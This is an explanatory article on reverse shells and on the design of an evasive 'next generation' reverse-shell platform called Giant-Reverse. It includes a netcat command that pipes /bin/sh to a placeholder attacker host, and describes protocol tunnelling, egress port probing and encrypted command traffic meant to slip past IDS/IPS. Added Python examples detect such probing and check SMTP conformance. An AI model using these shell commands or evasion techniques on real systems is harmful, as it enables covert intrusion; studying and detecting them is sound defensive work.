One of the most important stages after the successful exploitation of a remote system is maintaining persistent access to the compromised machine. Persistent access refers to the ability of the attacker to access the compromised system at any time after the exploitation. In the past, installing a backdoor that listens on a particular port and accepts connections on that port was the preferred method of keeping persistent access: the attacker would simply have a remote shell on the system and full control over it. This technique has become less feasible with the advent of security measures. With the wide deployment of firewalls, even the smallest corporate network has some sort of network access control, and inbound (incoming) connections are restricted by network administrators. Binding a shell to a local port on the remote system after a successful exploitation no longer gives the attacker persistent access.
The trend in the post-exploitation stage has moved from the “remote shell” to the “reverse shell”. Instead of the remote system listening on a particular port and waiting for an incoming connection, the remote system initiates a connection to the attacker’s machine; the attacker then uses that connection to send “shell” commands to the remote system for execution. It is called “reverse” because the shell control runs in the opposite direction to the established connection: the connection is established from the compromised system to the attacker, while the control traffic (the shell) flows from the attacker’s machine to the target machine. For a reverse shell to work, it is enough that the firewall allows one outgoing port, so that the compromised system can initiate the outbound connection through it.
There are various techniques for obtaining a reverse shell. An attacker who is exploiting a remote vulnerability that requires sending shellcode may construct shellcode that establishes a connection back to his/her machine and pipes a shell to that stream. Alternatively, the attacker can use an external program or script that provides this facility; SSH and Netcat are good candidates for the job. A reverse shell using netcat can be set up as follows: one netcat instance runs on the attacker’s machine and another runs on the compromised machine. If the attacker wants the reverse shell on port 2233, he/she runs netcat on his/her machine as follows:
$ netcat -v -l -p 2233
And on the compromised machine, he/she runs (where <attacker host> stands for the address of the listening machine):
$ netcat -e /bin/sh <attacker host> 2233
However, these techniques have several drawbacks. First, corporate networks deploy network security solutions beyond firewalls; the two main ones are application-level inspection engines and IDS/IPS. An application inspection engine monitors traffic at the application level (e.g. FTP, HTTP, POP3, SMTP, NTP, etc.) and filters out any non-standard behavior. In other words, the inspection engine makes sure that the application traffic conforms to the protocol as specified in its RFC; otherwise, the connection is blocked. For example, an SMTP inspection engine ensures at least the following:
- The commands and responses are standard SMTP commands and responses.
- The SMTP transaction happens in the standard sequence.
- An SMTP command from the client must be acknowledged by the server before the client is able to send the next command.
The same applies to other protocol inspection engines, like HTTP, POP3, FTP, etc.
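As an added illustration of the three SMTP checks above (my example, not code from the article or from the Giant-Reverse platform), the following Python models a minimal SMTP inspection engine: it walks a captured session and reports every non-standard verb, every command issued out of the standard transaction order, and every command sent before the server acknowledged the previous one. Both transcripts are constructed samples.

```python
import re

# Standard SMTP verbs (RFC 5321 core set); anything else is a non-standard command.
SMTP_VERBS = {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT", "VRFY", "EXPN", "HELP"}
ANY = {"init", "greeted", "mail", "rcpt"}
# Transaction order: the session states from which each verb is legal.
ALLOWED_FROM = {"HELO": {"init", "greeted"}, "EHLO": {"init", "greeted"}, "MAIL": {"greeted"},
                "RCPT": {"mail", "rcpt"}, "DATA": {"rcpt"}, "RSET": ANY - {"init"}}
NEXT_STATE = {"HELO": "greeted", "EHLO": "greeted", "MAIL": "mail", "RCPT": "rcpt",
              "DATA": "data", "RSET": "greeted", "QUIT": "quit"}
REPLY_RE = re.compile(r"^\d{3}[ -]")  # 3-digit reply code; "-" marks a continuation line

def inspect_smtp(session):
    """session: list of (side, line), side "C" (client) or "S" (server).
    Returns a list of (line_index, reason) for every deviation from the standard."""
    state, awaiting_reply, in_data, violations = "init", False, False, []
    for i, (side, line) in enumerate(session):
        if side == "S":
            if not REPLY_RE.match(line):
                violations.append((i, "non-standard server response"))
            elif line[3] == " ":  # final line of the reply: the client may proceed
                awaiting_reply = False
                if state == "data":  # only a 354 reply opens the message body
                    in_data, state = line.startswith("354"), "greeted"
            continue
        if in_data:  # message body is free-form until the lone "."
            if line == ".":
                in_data, awaiting_reply = False, True
            continue
        if awaiting_reply:
            violations.append((i, "command sent before previous one was acknowledged"))
        verb = line.split(" ", 1)[0].upper()
        if verb not in SMTP_VERBS:
            violations.append((i, f"non-standard command {verb}"))
        elif state not in ALLOWED_FROM.get(verb, ANY):
            violations.append((i, f"{verb} out of sequence in state {state}"))
        else:
            state = NEXT_STATE.get(verb, state)
        awaiting_reply = True  # every command needs a reply before the next one
    return violations

# Constructed sample transcripts: a conforming session and one that breaks all three rules.
GOOD = [("S", "220 mx.example.test ESMTP"), ("C", "EHLO h.example.test"), ("S", "250-mx.example.test"),
        ("S", "250 SIZE 10240000"), ("C", "MAIL FROM:<a@example.test>"), ("S", "250 OK"),
        ("C", "RCPT TO:<b@example.test>"), ("S", "250 OK"), ("C", "DATA"), ("S", "354 Go ahead"),
        ("C", "hello"), ("C", "."), ("S", "250 Queued"), ("C", "QUIT"), ("S", "221 Bye")]
BAD = [("S", "220 mx.example.test ESMTP"), ("C", "HELO h.example.test"), ("C", "MAIL FROM:<a@example.test>"),
       ("S", "250 Hello"), ("S", "250 OK"), ("C", "XSHELL id"), ("S", "500 Unknown"), ("C", "DATA"),
       ("S", "503 Bad sequence")]
```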
An IDS/IPS device extends the monitoring beyond conformance checking to inspecting the variable fields of standard traffic and making sure they do not contain malicious content. For example, the username field of the POP3 protocol may contain any data. If an attacker places an exploit for a remote buffer overflow vulnerability in the username field, the inspection engine will not detect it; the IDS/IPS, however, may detect it if it knows the signature of the shellcode.
Given these advances in network security solutions, conventional reverse-shell techniques have become obsolete. A reverse shell implemented with netcat or SSH does not conform to any predefined standard protocol and is therefore easily detectable. Another drawback of the existing implementations is that they do not provide reliable and maintainable access: if the connection drops for some reason, the attacker has to re-establish it manually.
The idea of the “Next Generation Reverse Shell” was born to provide reliable, maintainable, and persistent access to compromised systems and to withstand the modern advances in security measures. A platform called “Giant-Reverse” has also been developed to provide the facilities of the Next Gen. Reverse Shell. The characteristics and features of this new and original implementation are as follows:
[1] Next Gen. Reverse Shell utilizes standard protocols to tunnel shell commands and execution results. Protocols like HTTP, SMTP, POP3, FTP, NTP, and ICMP can be used to carry and transfer arbitrary data without violating the standard implementation of these protocols. By utilizing such protocols, the traffic not only passes through a network firewall but also appears as legitimate traffic in the eyes of an inspection engine or IDS/IPS.
[2] Next Gen. Reverse Shell has the ability to automatically detect the open ports on the firewall. When the client agent runs, it tries to connect to the server machine (controlled by the attacker) on various ports until it finds one that is open. For example, it tries to connect to port 21 (FTP); if this port is closed, it tries port 80 (HTTP); if that is closed, it tries port 110 (POP3), and so on. With this feature the attacker does not need to worry about finding a suitable open port on the firewall and instructing the client to use it; rather, the client finds it automatically.
[3] Next Gen. Reverse Shell provides the ability to run multiple Shells simultaneously over a single stream. After establishing the reverse connection on a particular port, the specialist (e.g. security professional, attacker, etc.) can create more than one shell over this single TCP or UDP stream; all the Shells run concurrently and the specialist can swap between them. This provides greater control over the compromised system: the user can run a password sniffer in one shell, a password brute-force tool in another and a vulnerability scanner in a third.
[4] Next Gen. Reverse Shell provides the ability to control multiple compromised systems at once. The listening server running on the attacker’s machine can accept connections from different client agents, and the specialist then controls these clients simultaneously. He/she would run a program on the first client, then swap to a second one and run another program. At any time, the server can show details about the connected clients along with some statistical data.
[5] Next Gen. Reverse Shell gives the user the ability to change the tunneling protocol and port number at any time. If a client is connected to the server on port 21 with the FTP protocol, the user can change it to port 110 with the POP3 protocol. Once instructed to change protocol, the client halts the current connection and establishes a new one on the specified port.
[6] Next Gen. Reverse Shell has the ability to suspend the client agent for a specific amount of time. When a client is suspended, the state of the running Shells remains the same, and when the suspension period ends, the client re-establishes the connection while preserving the Shells. For example, if the user is running two simultaneous Shells and would like to stop working and resume the next day, he/she would instruct the client to suspend for one day. During the suspension (or sleep) period, no traffic is generated between the client and the server.
[7] Next Gen. Reverse Shell automatically re-establishes the connection in case of a disconnection. Just as the client automatically finds the open port, it can automatically initiate a new connection when the previous one is lost. Consider this scenario: if the corporate network administrator reboots the firewall, all connections are lost, and the attacker loses the currently established reverse-shell connection. However, once the client detects such a sudden disconnection, it re-establishes the connection.
[8] Next Gen. Reverse Shell provides the ability to conceal the transferred shell commands and execution results by either encoding or encrypting these messages. This is different from the SSH mechanism, which encrypts the whole application layer. The encryption and encoding mechanism of Next Gen. Reverse Shell encrypts or encodes only the contents tunneled within the normal standard protocols. For example, if the user is utilizing the SMTP protocol as a tunnel to transfer commands and results, the bodies of the messages are encrypted or encoded while the standard SMTP exchange itself is neither encrypted nor encoded. Say the attacker runs a command like “cat /etc/passwd”: the result of this command is transferred in plain text, and an administrator monitoring the traffic with his/her naked eye would see the content of the /etc/passwd file being transferred. With encryption, or at least encoding, such traffic may pass unnoticed by the administrator.
[9] Next Gen. Reverse Shell distinguishes between different sets of commands: an internal command set and a shell command set. Internal commands are used by the user to control the behavior of the Next Gen. Reverse Shell application; they enable the user to set or get specific variable data. For example, the internal command “create_shell” instantiates a new shell on the remote machine, and a command like “set_protocol” sets the tunneling protocol. Any command other than an internal command is considered a shell command and is executed on the remote machine; the results of the execution are returned to the user.
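The port walking described in [2] (port 21, then 80, then 110, and so on) leaves a recognisable trace in egress firewall logs, and the reconnection behaviour in [7] repeats it whenever the client has to find its way out again. The following added detector (my example, not part of the article or of Giant-Reverse; the log line format, the candidate port list and the 60-second window are assumptions) correlates, per source/destination pair, a run of denied outbound attempts on tunnel-candidate ports that is followed by an allowed connection on another such port.

```python
import re
from collections import defaultdict
from datetime import datetime

# Ports the article's client walks through (FTP, HTTP, POP3) plus SMTP and NTP; an assumed list.
CANDIDATE_PORTS = {21, 25, 80, 110, 123}
WINDOW_SECONDS = 60  # how long a denial stays relevant (assumed tuning value)
# Constructed log format (assumption): "<ISO time> <ALLOW|DENY> <src>:<sport> -> <dst>:<dport> <proto>"
LOG_RE = re.compile(r"^(\S+) (ALLOW|DENY) (\S+):\d+ -> (\S+):(\d+) (TCP|UDP)$")

def parse_line(line):
    """Return (time, action, src, dst, dport) or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, action, src, dst, dport, _proto = m.groups()
    return datetime.fromisoformat(ts), action, src, dst, int(dport)

def find_egress_probing(lines, min_denied=2):
    """Alert as (src, dst, denied_ports, allowed_port) when one internal host was refused on at
    least min_denied distinct candidate ports to one destination and then allowed on another."""
    flows = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        ts, action, src, dst, dport = rec
        if dport in CANDIDATE_PORTS:
            flows[(src, dst)].append((ts, action, dport))
    alerts = []
    for (src, dst), events in flows.items():
        events.sort()
        denied = []  # (time, port) of recent denials, one entry per port
        for ts, action, dport in events:
            denied = [(t, p) for t, p in denied if (ts - t).total_seconds() <= WINDOW_SECONDS]
            if action == "DENY":
                if dport not in {p for _, p in denied}:
                    denied.append((ts, dport))
            elif len(denied) >= min_denied:  # an ALLOW right after a run of refusals
                alerts.append((src, dst, sorted(p for _, p in denied), dport))
                denied = []
    return alerts

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    "2024-05-01T10:00:01 DENY 10.0.0.5:51000 -> 203.0.113.7:21 TCP",
    "2024-05-01T10:00:02 DENY 10.0.0.5:51001 -> 203.0.113.7:80 TCP",
    "2024-05-01T10:00:03 ALLOW 10.0.0.5:51002 -> 203.0.113.7:110 TCP",
    "2024-05-01T10:05:00 ALLOW 10.0.0.9:40000 -> 198.51.100.2:80 TCP",
    "2024-05-01T10:06:00 DENY 10.0.0.9:40001 -> 198.51.100.2:21 TCP",
]
```

A single denial followed by a normal allowed connection (the second host above) does not fire; only the walk across several candidate ports does.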